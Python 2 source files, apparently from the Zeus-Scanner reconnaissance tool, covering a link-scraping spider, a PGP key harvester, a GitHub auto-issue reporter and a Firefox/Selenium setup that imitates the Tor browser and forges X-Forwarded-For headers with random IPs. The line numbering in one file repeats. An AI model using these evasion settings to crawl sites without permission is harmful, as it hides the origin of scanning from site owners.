99 | "Running details:\n`{}`\n\n"
100 | "Commands used:\n`{}`\n\n"
101 | "Log file info:\n```{}```".format(
102 | lib.core.settings.VERSION,
103 | "{}".format(ff_version),
104 | open(lib.core.settings.GECKO_VERSION_INFO_PATH).read(),
105 | str(stacktrace),
106 | str(platform.platform()),
107 | " ".join(sys.argv),
108 | log_file_information
109 | ),
110 | }
111 |
112 | _json_data = json.dumps(issue_data)
113 | if sys.version_info > (3,): # python 3
114 | _json_data = _json_data.encode("utf-8")
115 |
116 | try:
117 | req = urllib2.Request(
118 | url="https://api.github.com/repos/ekultek/zeus-scanner/issues", data=_json_data,
119 | headers={"Authorization": "token {}".format(token)}
120 | )
121 | urllib2.urlopen(req, timeout=10).read()
122 | lib.core.settings.logger.info(lib.core.settings.set_color(
123 | "issue has been created successfully with the following name '{}', your unique identifier "
124 | "for this issue is '{}' and the URL to your issue is '{}'".format(
125 | issue_title, identifier, find_url(identifier)
126 | )
127 | ))
128 | except Exception as e:
129 | lib.core.settings.logger.exception(lib.core.settings.set_color(
130 | "failed to auto create the issue, got exception '{}', "
131 | "you may manually create an issue".format(e), level=50
132 | ))
133 |
--------------------------------------------------------------------------------
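find_url can also be used on its own to look up a previously filed issue by its identifier; it needs network access and returns None when nothing on the issues page matches. A hedged sketch (the identifier shown is made up):

    from var.auto_issue.github import find_url

    url = find_url("0a1b2c3d")  # hypothetical identifier from a previous run
    print(url or "no matching issue found")

--------------------------------------------------------------------------------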
/var/blackwidow/__init__.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | from bs4 import BeautifulSoup
4 |
5 | import lib.core.errors
6 | import lib.core.common
7 | import lib.core.settings
8 | import var.auto_issue.github
9 |
10 |
11 | class Blackwidow(object):
12 |
13 | """
14 | spider to scrape a webpage for all available URL's
15 | """
16 |
17 | def __init__(self, url, user_agent=None, proxy=None, forward=None):
18 | self.url = url
19 | self.forward = forward or None
20 | self.proxy = proxy
21 | self.user_agent = user_agent or lib.core.settings.DEFAULT_USER_AGENT
22 |
23 | @staticmethod
24 | def get_url_ext(url):
25 | """
26 | get the extension of the URL
27 | """
28 | try:
29 | data = url.split(".")
30 | return data[-1] in lib.core.settings.SPIDER_EXT_EXCLUDE
31 | except (IndexError, Exception):
32 | pass
33 |
34 | def test_connection(self):
35 | """
36 | make sure the connection is good before you continue
37 | """
38 | try:
39 | # we'll skip SSL verification to avoid any SSLErrors that might
40 | # arise, we won't really need it with this anyways
41 | attempt, status, _, _ = lib.core.common.get_page(
42 | self.url, agent=self.user_agent, xforward=self.forward, skip_verf=True,
43 | proxy=self.proxy
44 | )
45 | if status == 200:
46 | return "ok", None
47 | return "fail", attempt.status_code
48 | except Exception as e:
49 | if "Max retries exceeded with url" in str(e):
50 | info_msg = ""
51 | if "https://" in self.url:
52 | info_msg += ", try dropping https:// to http://"
53 | else:
54 | info_msg += ""
55 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
56 | "provided website '{}' is refusing connection{}".format(
57 | self.url, info_msg
58 | ), level=50
59 | ))
60 | lib.core.common.shutdown()
61 | else:
62 | lib.core.settings.logger.exception(lib.core.settings.set_color(
63 | "failed to connect to '{}' received error '{}'".format(
64 | self.url, e
65 | ), level=50
66 | ))
67 | var.auto_issue.github.request_issue_creation()
68 | lib.core.common.shutdown()
69 |
70 | def scrape_page_for_links(self, given_url, attribute="a", descriptor="href"):
71 | """
72 | scrape the webpage's HTML for usable GET links
73 | """
74 | unique_links = set()
75 | true_url = lib.core.settings.replace_http(given_url)
76 | _, status, html_page, _ = lib.core.common.get_page(
77 | given_url, agent=self.user_agent, proxy=self.proxy
78 | )
79 | soup = BeautifulSoup(html_page, "html.parser")
80 | for link in soup.findAll(attribute):
81 |             found_redirect = link.get(descriptor)
82 |             if found_redirect is None:
83 |                 # str() would turn a missing attribute into the literal "None"
84 |                 continue
85 |             found_redirect = str(found_redirect).decode("unicode_escape")
86 |             if lib.core.settings.URL_REGEX.match(found_redirect):
87 |                 unique_links.add(found_redirect)
88 |             else:
89 |                 unique_links.add("http://{}/{}".format(true_url, found_redirect))
90 |         return list(unique_links)
87 |
88 |
89 | def blackwidow_main(url, **kwargs):
90 | """
91 | scrape a given URL for all available links
92 | """
93 | verbose = kwargs.get("verbose", False)
94 | proxy = kwargs.get("proxy", None)
95 | agent = kwargs.get("agent", None)
96 | forward = kwargs.get("forward", None)
97 |
98 | if forward is not None:
99 | forward = (
100 | lib.core.settings.create_random_ip(),
101 | lib.core.settings.create_random_ip(),
102 | lib.core.settings.create_random_ip()
103 | )
104 |
105 | if verbose:
106 | lib.core.settings.logger.debug(lib.core.settings.set_color(
107 | "settings user-agent to '{}'".format(agent), level=10
108 | ))
109 | if proxy is not None:
110 | if verbose:
111 | lib.core.settings.logger.debug(lib.core.settings.set_color(
112 | "running behind proxy '{}'".format(proxy), level=10
113 | ))
114 | lib.core.settings.create_dir("{}/{}".format(os.getcwd(), "log/blackwidow-log"))
115 | lib.core.settings.logger.info(lib.core.settings.set_color(
116 | "starting blackwidow on '{}'".format(url)
117 | ))
118 | crawler = Blackwidow(url, user_agent=agent, proxy=proxy, forward=forward)
119 | if verbose:
120 | lib.core.settings.logger.debug(lib.core.settings.set_color(
121 | "testing connection to the URL", level=10
122 | ))
123 | test_code = crawler.test_connection()
124 | if not test_code[0] == "ok":
125 | error_msg = (
126 | "connection test failed with status code: {}, reason: '{}'. "
127 | "test connection needs to pass, try a different link"
128 | )
129 | for error_code in lib.core.common.STATUS_CODES.keys():
130 | if error_code == test_code[1]:
131 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
132 | error_msg.format(
133 | test_code[1], lib.core.common.STATUS_CODES[error_code].title()
134 | ), level=50
135 | ))
136 | lib.core.common.shutdown()
137 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
138 | error_msg.format(
139 | test_code[1], lib.core.common.STATUS_CODES["other"].title()
140 | ), level=50
141 | ))
142 | lib.core.common.shutdown()
143 | else:
144 | lib.core.settings.logger.info(lib.core.settings.set_color(
145 | "connection test succeeded, continuing", level=25
146 | ))
147 | lib.core.settings.logger.info(lib.core.settings.set_color(
148 | "crawling given URL '{}' for links".format(url)
149 | ))
150 | found = crawler.scrape_page_for_links(url)
151 | if len(found) > 0:
152 | lib.core.settings.logger.info(lib.core.settings.set_color(
153 | "found a total of {} links from given URL '{}'".format(
154 | len(found), url
155 | ), level=25
156 | ))
157 | lib.core.common.write_to_log_file(found, path=lib.core.settings.SPIDER_LOG_PATH,
158 | filename=lib.core.settings.BLACKWIDOW_FILENAME)
159 | else:
160 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
161 | "did not find any usable links from '{}'".format(url), level=50
162 | ))
--------------------------------------------------------------------------------
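Driving the spider by hand comes down to a single call; it logs its findings under log/blackwidow-log. A minimal sketch, assuming it is run from the repository root with network access:

    from var.blackwidow import blackwidow_main

    blackwidow_main("http://example.com", verbose=True)

--------------------------------------------------------------------------------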
/var/search/__init__.py:
--------------------------------------------------------------------------------
1 | import whichcraft
2 | from selenium import webdriver
3 | from selenium.webdriver.common.proxy import *
4 | from selenium.webdriver.remote.errorhandler import WebDriverException
5 |
6 | from lib.core.common import HTTP_HEADER
7 | from lib.core.settings import (
8 | logger,
9 | set_color,
10 | create_random_ip,
11 | DEFAULT_USER_AGENT
12 | )
13 |
14 |
15 | class SetBrowser(object):
16 |
17 | """
18 | set the Firefox browser settings
19 | """
20 |
21 | def __init__(self, **kwargs):
22 | self.agent = kwargs.get("agent", DEFAULT_USER_AGENT)
23 | self.proxy = kwargs.get("proxy", None)
24 | self.xforward = kwargs.get("xforward", False)
25 | self.tor = kwargs.get("tor", False)
26 | self.tor_port = kwargs.get("port", 9050)
27 |
28 | def __set_proxy(self):
29 | """
30 | set the browser proxy settings
31 | """
32 | if not self.tor and self.proxy is not None:
33 | proxy_type = self.proxy.keys()
34 | proxy_to_use = Proxy({
35 | "proxyType": ProxyType.MANUAL,
36 | "httpProxy": self.proxy[proxy_type[0]],
37 | "ftpProxy": self.proxy[proxy_type[0]],
38 | "sslProxy": self.proxy[proxy_type[0]],
39 | "noProxy": ""
40 | })
41 | return proxy_to_use
42 | else:
43 | return None
44 |
45 | def __tor_browser_emulation(self, ff_browser):
46 | """
47 | set the Firefox browser settings to mimic the Tor browser
48 | """
49 | preferences = {
50 | "privacy": [
51 | # set the privacy settings
52 | ("places.history.enabled", False),
53 | ("privacy.clearOnShutdown.offlineApps", True),
54 | ("privacy.clearOnShutdown.passwords", True),
55 | ("privacy.clearOnShutdown.siteSettings", True),
56 | ("privacy.sanitize.sanitizeOnShutdown", True),
57 | ("signon.rememberSignons", False),
58 | ("network.cookie.lifetimePolicy", 2),
59 | ("network.dns.disablePrefetch", True),
60 | ("network.http.sendRefererHeader", 0)
61 | ],
62 | "proxy": [
63 | # set the proxy settings
64 | ("network.proxy.type", 1),
65 | ("network.proxy.socks_version", 5),
66 | ("network.proxy.socks", '127.0.0.1'),
67 | ("network.proxy.socks_port", self.tor_port),
68 | ("network.proxy.socks_remote_dns", True)
69 | ],
70 | "javascript": [
71 |                 # disable the javascript settings
72 | ("javascript.enabled", False)
73 | ],
74 | "download": [
75 | # get a speed increase by not downloading the images
76 | ("permissions.default.image", 2)
77 | ],
78 | "user-agent": [
79 | # set the user agent settings
80 | ("general.useragent.override", self.agent)
81 | ]
82 | }
83 | for preference in preferences.iterkeys():
84 | for setting in preferences[preference]:
85 | ff_browser.set_preference(setting[0], setting[1])
86 | return ff_browser
87 |
88 | def __set_x_forward(self, profile):
89 | """
90 | set the X-Forwarded-For headers for selenium, this can only be done
91 | if you are using a profile for Firefox, and ONLY IN FIREFOX.
92 | """
93 | ip_list = (
94 | create_random_ip(),
95 | create_random_ip(),
96 | create_random_ip()
97 | )
98 | # references:
99 | # https://eveningsamurai.wordpress.com/2013/11/21/changing-http-headers-for-a-selenium-webdriver-request/
100 | # https://stackoverflow.com/questions/6478672/how-to-send-an-http-requestheader-using-selenium-2/22238398#22238398
101 | # https://blog.giantgeek.com/?p=1455
102 |
103 | # amount of headers to modify
104 | profile.set_preference("modifyheaders.headers.count", 1)
105 | # action to take on the headers
106 | profile.set_preference("modifyheaders.headers.action0", "Add")
107 | # header name, in this case it's `X-Forwarded-For`
108 | profile.set_preference("modifyheaders.headers.name0", HTTP_HEADER.X_FORWARDED_FOR)
109 | # header value, in this case, it's 3 random IP addresses
110 | profile.set_preference("modifyheaders.headers.value0", "{}, {}, {}".format(
111 | ip_list[0], ip_list[1], ip_list[2]
112 | ))
113 | # enable the header modification
114 | profile.set_preference("modifyheaders.headers.enabled0", True)
115 | # send it through the configuration
116 | profile.set_preference("modifyheaders.config.active", True)
117 | # turn it on from the new configuration
118 | profile.set_preference("modifyheaders.config.alwaysOn", True)
119 | # as always, change the user agent
120 | profile.set_preference("general.useragent.override", self.agent)
121 | return profile
122 |
123 | def set_browser(self):
124 | """
125 | set the browser settings
126 | """
127 | profile = webdriver.FirefoxProfile()
128 | try:
129 |             if self.xforward:
130 |                 # apply the X-Forwarded-For profile before the plain branch,
131 |                 # otherwise a non-Tor run silently skips the header setup
132 |                 profile = self.__set_x_forward(profile)
133 |                 browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
134 |             elif self.tor:
135 |                 logger.info(set_color(
136 |                     "setting the Tor browser emulation"
137 |                 ))
138 |                 profile = self.__tor_browser_emulation(profile)
139 |                 browser = webdriver.Firefox(profile)
140 |             else:
141 |                 logger.info(set_color(
142 |                     "setting the browser"
143 |                 ))
144 |                 profile.set_preference("general.useragent.override", self.agent)
145 |                 browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
146 |         except (OSError, WebDriverException):
147 |             # retry with an explicit geckodriver path for setups where it is not on the PATH
148 |             if self.xforward:
149 |                 profile = self.__set_x_forward(profile)
150 |                 browser = webdriver.Firefox(profile, proxy=self.__set_proxy(),
151 |                                             executable_path=whichcraft.which("geckodriver"))
152 |             elif self.tor:
153 |                 profile = self.__tor_browser_emulation(profile)
154 |                 browser = webdriver.Firefox(profile, executable_path=whichcraft.which("geckodriver"))
155 |             else:
156 |                 profile.set_preference("general.useragent.override", self.agent)
157 |                 browser = webdriver.Firefox(profile, proxy=self.__set_proxy(),
158 |                                             executable_path=whichcraft.which("geckodriver"))
159 |         return browser
160 |
--------------------------------------------------------------------------------
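A minimal sketch of building a browser with SetBrowser, assuming the project's Python 2 environment, Firefox with geckodriver installed, and (for this configuration) a Tor SOCKS proxy listening on 127.0.0.1:9050:

    from var.search import SetBrowser

    browser = SetBrowser(tor=True, port=9050).set_browser()
    browser.get("https://check.torproject.org")
    browser.quit()

--------------------------------------------------------------------------------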
/var/search/pgp_search.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import requests
4 | from bs4 import BeautifulSoup
5 | from requests.exceptions import ReadTimeout
6 |
7 | import lib.core.common
8 | import lib.core.settings
9 |
10 |
11 | def __create_url(ext):
12 | """
13 | create the URL with the identifier, usually a hash
14 | """
15 | url = lib.core.settings.AUTHORIZED_SEARCH_ENGINES["pgp"]
16 | items = url.split("/")
17 |     # if the identifier already starts with a `/`, don't add another one
18 | if "/" in ext[0]:
19 | retval = "{}//{}{}".format(items[0], items[2], ext)
20 | else:
21 | # otherwise we'll just add it
22 | retval = "{}//{}/{}".format(items[0], items[2], ext)
23 | return retval
24 |
25 |
26 | def __set_headers(**kwargs):
27 | """
28 | set the HTTP headers
29 | """
30 | agent = kwargs.get("agent", None)
31 | xforward = kwargs.get("xforward", False)
32 | if not xforward:
33 | headers = {
34 | lib.core.common.HTTP_HEADER.CONNECTION: "close",
35 | lib.core.common.HTTP_HEADER.USER_AGENT: agent
36 | }
37 | else:
38 | ip_list = (
39 | lib.core.settings.create_random_ip(),
40 | lib.core.settings.create_random_ip(),
41 | lib.core.settings.create_random_ip()
42 | )
43 | headers = {
44 | lib.core.common.HTTP_HEADER.CONNECTION: "close",
45 | lib.core.common.HTTP_HEADER.USER_AGENT: agent,
46 | lib.core.common.HTTP_HEADER.X_FORWARDED_FOR: "{}, {}, {}".format(
47 | ip_list[0], ip_list[1], ip_list[2]
48 | )
49 | }
50 | return headers
51 |
52 |
53 | def obtain_html(url, query, **kwargs):
54 | """
55 | obtain the HTML containing the URL redirects to the public PGP keys
56 | """
57 | agent = kwargs.get("agent", None)
58 | xforward = kwargs.get("xforwad", False)
59 | proxy = kwargs.get("proxy", None)
60 | url = url.format(query)
61 | # regular expression to match if no results are given
62 | result_regex = re.compile("<.+>no.results.found<.+.>", re.I)
63 | req = requests.get(
64 | url,
65 |         headers=__set_headers(agent=agent, xforward=xforward),  # set the headers
66 | proxies=lib.core.settings.proxy_string_to_dict(proxy),
67 | timeout=10
68 | )
69 | status, html = req.status_code, req.content
70 | if status == 200:
71 | # check against the regex
72 | if result_regex.search(str(html)) is not None:
73 | return None
74 | else:
75 | return html
76 | return None
77 |
78 |
79 | def gather_urls(html, attribute="a", descriptor="href"):
80 | """
81 | get the URLs within the HTML
82 | """
83 | redirects, retval = set(), set()
84 | soup = BeautifulSoup(html, "html.parser")
85 | for link in soup.findAll(attribute):
86 | found_redirect = str(link.get(descriptor)).decode("unicode_escape")
87 | if lib.core.settings.PGP_IDENTIFIER_REGEX.search(found_redirect) is not None:
88 | redirects.add(found_redirect)
89 | for link in redirects:
90 | url = __create_url(link)
91 | if lib.core.settings.URL_REGEX.match(url):
92 | retval.add(url)
93 | return list(retval)
94 |
95 |
96 | def get_pgp_keys(url_list, query, attribute="pre", **kwargs):
97 | """
98 | get the PGP keys by connecting to the URLs and pulling the information from the HTML
99 | """
100 | agent = kwargs.get("agent", None)
101 | proxy = kwargs.get("proxy", None)
102 | xforward = kwargs.get("xforward", None)
103 | verbose = kwargs.get("verbose", False)
104 |     amount_to_search = kwargs.get("search_amount", 75)  # TODO: add a way to increase this
105 |
106 | data_sep = "-" * 30
107 |     extracted_keys, identifiers = [], []  # lists keep insertion order so keys pair with identifiers
108 | # regex to match the beginning of a PGP key
109 | identity_matcher = re.compile(r"\bbegin.pgp.public.key.block", re.I)
110 | amount_left = len(url_list)
111 | lib.core.settings.logger.info(lib.core.settings.set_color(
112 | "checking a maximum of {} PGP keys".format(amount_to_search)
113 | ))
114 | for i, url in enumerate(url_list, start=1):
115 |         if i > amount_to_search:
116 | break
117 | if verbose:
118 | lib.core.settings.logger.debug(lib.core.settings.set_color(
119 | "checking '{}'".format(url), level=10
120 | ))
121 | if i % 25 == 0:
122 | lib.core.settings.logger.info(lib.core.settings.set_color(
123 | "currently checking PGP key #{}, {} left to check ({} total found)".format(
124 | i, amount_to_search - i, amount_left
125 | )
126 | ))
127 | identifiers.append(lib.core.settings.PGP_IDENTIFIER_REGEX.search(str(url)).group())
128 | try:
129 | req = requests.get(
130 | url,
131 |                 headers=__set_headers(agent=agent, xforward=xforward),
132 | proxies=lib.core.settings.proxy_string_to_dict(proxy),
133 | timeout=10
134 | )
135 | status, html = req.status_code, req.content
136 | if status == 200:
137 | soup = BeautifulSoup(html, "html.parser")
138 | context = soup.findAll(attribute)[0]
139 | if identity_matcher.search(str(context)) is not None:
140 |                     extracted_keys.append(context)
141 | except ReadTimeout:
142 | lib.core.settings.logger.error(lib.core.settings.set_color(
143 | "PGP key failed connection, assuming no good and skipping", level=40
144 | ))
145 | for i, k in enumerate(extracted_keys):
146 | pgp_key = str(k).split("<{}>".format(attribute)) # split the string by the tag
147 |         pgp_key = pgp_key[1].split("</{}>".format(attribute))[0]  # split it again by the closing tag
148 | if verbose:
149 | lib.core.settings.logger.debug(lib.core.settings.set_color(
150 | "found PGP:", level=10
151 | ))
152 |             # output the found PGP key when running verbose
153 |             print("{}\n{}\n{}".format(data_sep, pgp_key, data_sep))
154 | lib.core.common.write_to_log_file(
155 | pgp_key, lib.core.settings.PGP_KEYS_FILE_PATH, lib.core.settings.PGP_KEY_FILENAME.format(identifiers[i], query)
156 | )
157 |
158 |
159 | def pgp_main(query, verbose=False):
160 | try:
161 | try:
162 | query = lib.core.settings.replace_http(query, queries=False, complete=True).split(".")[0]
163 | # make sure the query isn't going to fail
164 | except Exception:
165 | query = query
166 | lib.core.settings.logger.info(lib.core.settings.set_color(
167 | "searching public PGP files with given query '{}'".format(query)
168 | ))
169 | try:
170 | html = obtain_html(
171 | lib.core.settings.AUTHORIZED_SEARCH_ENGINES["pgp"], query, agent=lib.core.settings.DEFAULT_USER_AGENT
172 | )
173 | except (Exception, ReadTimeout):
174 | lib.core.settings.logger.warning(lib.core.settings.set_color(
175 | "connection failed, assuming no PGP keys", level=30
176 | ))
177 | html = None
178 | if html is not None:
179 | urls = gather_urls(html)
180 | lib.core.settings.logger.info(lib.core.settings.set_color(
181 | "found a total of {} URLs".format(len(urls))
182 | ))
183 | if verbose:
184 | lib.core.settings.logger.debug(lib.core.settings.set_color(
185 | "found a '{}'".format(urls), level=10
186 | ))
187 | lib.core.settings.logger.info(lib.core.settings.set_color(
188 | "gathering PGP key(s) and writing to a file", level=25
189 | ))
190 | return get_pgp_keys(urls, query, verbose=verbose)
191 | else:
192 | lib.core.settings.logger.warning(lib.core.settings.set_color(
193 | "did not find anything using query '{}'".format(query), level=30
194 | ))
195 | except KeyboardInterrupt:
196 | if not lib.core.common.pause():
197 | lib.core.common.shutdown()
--------------------------------------------------------------------------------
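The whole PGP lookup is driven through pgp_main; a minimal sketch, assuming it is run from the repository root with network access (the query is made up):

    from var.search.pgp_search import pgp_main

    pgp_main("example.com", verbose=True)

--------------------------------------------------------------------------------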